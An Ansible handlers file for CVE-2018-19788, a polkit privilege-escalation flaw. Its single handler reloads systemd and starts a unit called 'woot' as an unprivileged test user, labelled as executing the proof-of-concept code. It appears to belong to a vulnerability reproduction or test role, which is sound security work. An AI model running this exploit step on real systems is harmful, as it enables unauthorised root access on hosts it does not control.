---
# handlers file for CVE-2018-19788

- name: Execute the PoC code as unprivileged user
  systemd:
    state: started
    daemon_reload: Yes
    name: woot
  become: Yes
  become_user: "{{ CVE_2018_19788_test_user }}"